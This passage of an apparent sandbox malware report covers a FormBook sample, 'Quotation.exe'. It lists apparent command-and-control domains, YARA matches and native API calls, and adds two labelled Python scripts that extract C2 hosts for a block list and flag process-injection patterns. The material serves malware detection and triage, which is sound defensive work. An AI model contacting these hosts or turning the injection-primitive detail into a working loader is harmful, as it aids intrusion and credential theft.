      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store/hy29/www.dfg3n489.cyou
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/www.owboyaero.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyzReferer:
      Source: Quotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Quotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store/hy29/concg
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online/hy29/www.eifeigou.top
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.onlineReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink/hy29/www.unnify.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.inkReferer:
      Source: explorer.exe, 00000005.00000000.2527576116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000005.00000002.3259903697.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000005.00000000.2521577979.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3259903697.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000005.00000000.2520656031.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3258695825.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: explorer.exe, 00000005.00000002.3262974306.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262974306.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000005.00000000.2527576116.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
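The URL strings above share one campaign path ("/hy29/") and, because the entries sit back to back in memory, the string extractor has often glued the next list entry ("www.<host>") or the adjacent "Referer:" header text onto a URL. The following script is an added example, not part of the Joe Sandbox report and not FormBook code: it parses a constructed subset of the rows above (six lines copied from the listing), strips that debris, and groups hosts by campaign tag so that benign URLs that happen to be in the same explorer.exe memory dump (www.w3c.org, api.msn.com) do not end up on the block list. The campaign-path regex and the "Referer:" suffix handling are the example's own heuristics.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input for this example: a handful of rows copied from the
# report's "String found in binary or memory" listing, in the flattened
# "...sdmpString found in binary or memory: <string>" form the report uses.
SAMPLE_ROWS = """\
Source: explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.site/hy29/www.alkak.cam
Source: explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.siteReferer:
Source: explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/www.owboyaero.net
Source: explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/
Source: Quotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000005.00000002.3262290605.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
"""

ROW_RE = re.compile(r"^Source: (?P<proc>[^,]+),.*String found in binary or memory: (?P<url>\S+)$")
# Campaign path heuristic: a short alphanumeric directory ("/hy29/"), optionally
# followed by the next "www.<host>" entry of the list, which the string extractor
# glued on because the entries sit back to back in memory.
PATH_RE = re.compile(r"^/(?P<tag>[a-z0-9]{2,8})/(?P<next>www\.[^/\s]+)?$")
# Text from the adjacent HTTP header template that got appended to bare hosts.
DEBRIS_SUFFIXES = ("Referer:",)


def parse_rows(text):
    """Yield (process, scheme, host, path) for every string row in the report text."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        url = m.group("url")
        for suffix in DEBRIS_SUFFIXES:
            if url.endswith(suffix):
                url = url[: -len(suffix)]
        parts = urlsplit(url)
        yield m.group("proc"), parts.scheme, parts.netloc.lower(), parts.path


def extract_c2(text):
    """Group hosts by campaign tag. A host counts only when it is seen with the
    campaign path or as the glued-on next list entry, so benign URLs that happen
    to be in the same memory dump are not swept in."""
    campaigns = {}
    for _proc, _scheme, host, path in parse_rows(text):
        pm = PATH_RE.match(path)
        if not pm:
            continue
        hosts = campaigns.setdefault(pm.group("tag"), set())
        hosts.add(host)
        if pm.group("next"):
            hosts.add(pm.group("next").lower())
    return {tag: sorted(hosts) for tag, hosts in campaigns.items()}


def ioc_domains(text, tag):
    """Names for a block list: drop the leading 'www.' the C2 list carries so a
    DNS rule covers the apex as well as the www label."""
    hosts = extract_c2(text).get(tag, [])
    return sorted({h[4:] if h.startswith("www.") else h for h in hosts})


if __name__ == "__main__":
    for tag, hosts in extract_c2(SAMPLE_ROWS).items():
        print(f"campaign path /{tag}/: {len(hosts)} hosts")
        for h in hosts:
            print("  ", h)
    print("block list:", ", ".join(ioc_domains(SAMPLE_ROWS, "hy29")))
```

Run against the full listing, the same grouping yields the whole decoy/C2 set for "/hy29/"; hosts that appear only as a bare URL with no path are deliberately not added, since the path is the only thing tying a string to the campaign.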

      E-Banking Fraud

      Source: Yara matchFile source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: Quotation.exe PID: 3288, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: colorcpl.exe PID: 2284, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: initial sampleStatic PE information: Filename: Quotation.exe
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_33E92BF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92B60 NtClose,LdrInitializeThunk,3_2_33E92B60
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AD0 NtReadFile,LdrInitializeThunk,3_2_33E92AD0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FE0 NtCreateFile,LdrInitializeThunk,3_2_33E92FE0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FB0 NtResumeThread,LdrInitializeThunk,3_2_33E92FB0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_33E92F90
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F30 NtCreateSection,LdrInitializeThunk,3_2_33E92F30
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_33E92EA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_33E92E80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_33E92DF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92DD0 NtDelayExecution,LdrInitializeThunk,3_2_33E92DD0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_33E92D30
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D10 NtMapViewOfSection,LdrInitializeThunk,3_2_33E92D10
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_33E92CA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_33E92C70
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94340 NtSetContextThread,3_2_33E94340
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E93090 NtSetValueKey,3_2_33E93090
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E93010 NtOpenDirectoryObject,3_2_33E93010
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94650 NtSuspendThread,3_2_33E94650
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E935C0 NtCreateMutant,3_2_33E935C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BE0 NtQueryValueKey,3_2_33E92BE0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BA0 NtEnumerateValueKey,3_2_33E92BA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92B80 NtQueryInformationFile,3_2_33E92B80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AF0 NtWriteFile,3_2_33E92AF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AB0 NtWaitForSingleObject,3_2_33E92AB0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E939B0 NtGetContextThread,3_2_33E939B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FA0 NtQuerySection,3_2_33E92FA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F60 NtCreateProcessEx,3_2_33E92F60
      Source: C:\Windows\explorer.exeCode function: 5_2_0B142E12 NtProtectVirtualMemory,5_2_0B142E12
      Source: C:\Windows\explorer.exeCode function: 5_2_0B141232 NtCreateFile,5_2_0B141232
      Source: C:\Windows\explorer.exeCode function: 5_2_0B142E0A NtProtectVirtualMemory,5_2_0B142E0A
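The Nt* routines listed above are raw primitives; what a triage analyst needs is which combinations are present in one image. The script below is an added example, not Joe Sandbox output or code: it parses a constructed subset of the rows above (twelve lines copied from the listing), collects the Nt* names per image (the report's process tag such as 3_2 is carried but not interpreted, and the LdrInitializeThunk entries are ignored), and matches each set against three injection patterns. The pattern definitions are the example's own heuristic, not a Joe Sandbox signature, and a match shows capability in the code, not the order in which the calls were actually made.

```python
import re

# Constructed sample input for this example: rows copied from the report's
# native-API listing (Quotation.exe, process tag 3_2, and explorer.exe, 5_2).
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_33E92BF0
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_33E92F90
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F30 NtCreateSection,LdrInitializeThunk,3_2_33E92F30
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_33E92D30
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D10 NtMapViewOfSection,LdrInitializeThunk,3_2_33E92D10
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94340 NtSetContextThread,3_2_33E94340
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94650 NtSuspendThread,3_2_33E94650
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E939B0 NtGetContextThread,3_2_33E939B0
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FB0 NtResumeThread,LdrInitializeThunk,3_2_33E92FB0
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F60 NtCreateProcessEx,3_2_33E92F60
Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92B60 NtClose,LdrInitializeThunk,3_2_33E92B60
Source: C:\Windows\explorer.exeCode function: 5_2_0B142E12 NtProtectVirtualMemory,5_2_0B142E12
"""

ROW_RE = re.compile(
    r"^Source: (?P<image>.+?)Code function: (?P<tag>\d+_\d+)_(?P<addr>[0-9A-F]+) (?P<calls>\S+)$"
)

# Primitive sets for the injection techniques an Nt* list can evidence.
# All of 'required' must be present; at least one of 'any_of' must be, if non-empty.
INJECTION_PATTERNS = {
    # Hollowing: target created/suspended, its image unmapped, payload mapped or
    # allocated in its place, thread context pointed at the payload, thread resumed.
    "process_hollowing": (
        {"NtUnmapViewOfSection", "NtSetContextThread", "NtResumeThread"},
        {"NtCreateProcessEx", "NtMapViewOfSection", "NtAllocateVirtualMemory"},
    ),
    # Thread hijacking inside a running process: suspend, read, rewrite, resume.
    "thread_hijack": (
        {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
        set(),
    ),
    # Section-based injection: a section mapped across processes instead of
    # NtWriteVirtualMemory, so the usual write primitive never shows up.
    "section_mapping": (
        {"NtCreateSection", "NtMapViewOfSection"},
        {"NtProtectVirtualMemory", "NtUnmapViewOfSection"},
    ),
}


def native_calls_by_image(text):
    """Map image basename -> set of Nt* routines its code reaches."""
    calls = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        image = m.group("image").rsplit("\\", 1)[-1]
        names = {c for c in m.group("calls").split(",") if c.startswith("Nt")}
        calls.setdefault(image, set()).update(names)
    return calls


def match_injection(nt_calls):
    """Return the names of every pattern whose primitives are all present."""
    hits = []
    for name, (required, any_of) in INJECTION_PATTERNS.items():
        if required <= nt_calls and (not any_of or nt_calls & any_of):
            hits.append(name)
    return hits


def triage(text):
    """Per image: matched techniques plus the primitives that justify them."""
    result = {}
    for image, nt_calls in native_calls_by_image(text).items():
        hits = match_injection(nt_calls)
        evidence = set()
        for name in hits:
            required, any_of = INJECTION_PATTERNS[name]
            evidence |= required | (nt_calls & any_of)
        result[image] = {"techniques": hits, "evidence": sorted(evidence)}
    return result


if __name__ == "__main__":
    for image, verdict in triage(SAMPLE_ROWS).items():
        print(image, verdict["techniques"] or "no injection pattern")
        for api in verdict["evidence"]:
            print("   ", api)
```

Note what is absent from the listing: no NtWriteVirtualMemory. A detection keyed on WriteProcessMemory misses this loader, because mapping a section into the target is the write; the section_mapping pattern above exists for that reason.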
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00406C3F0_2_00406C3F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF0_2_73421BFF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F203E63_2_33F203E6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F03_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1A3523_2_33F1A352
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C03_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A03_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F002743_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F181CC3_2_33F181CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6B1B03_2_33E6B1B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F201AA3_2_33F201AA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E9516C3_2_33E9516C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F1723_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B16B3_2_33F2B16B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE81583_2_33EE8158
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E501003_2_33E50100
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA1183_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F0E03_2_33F1F0E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F170E93_2_33F170E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C03_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F0CC3_2_33F0F0CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5C7C03_2_33E5C7C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F7B03_2_33F1F7B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E607703_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E847503_2_33E84750
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7C6E03_2_33E7C6E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFD5B03_2_33EFD5B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F205913_2_33F20591
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F175713_2_33F17571
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E605353_2_33E60535
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0E4F63_2_33F0E4F6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E514603_2_33E51460
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F124463_2_33F12446
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F43F3_2_33F1F43F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E9DBF93_2_33E9DBF9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED5BF03_2_33ED5BF0
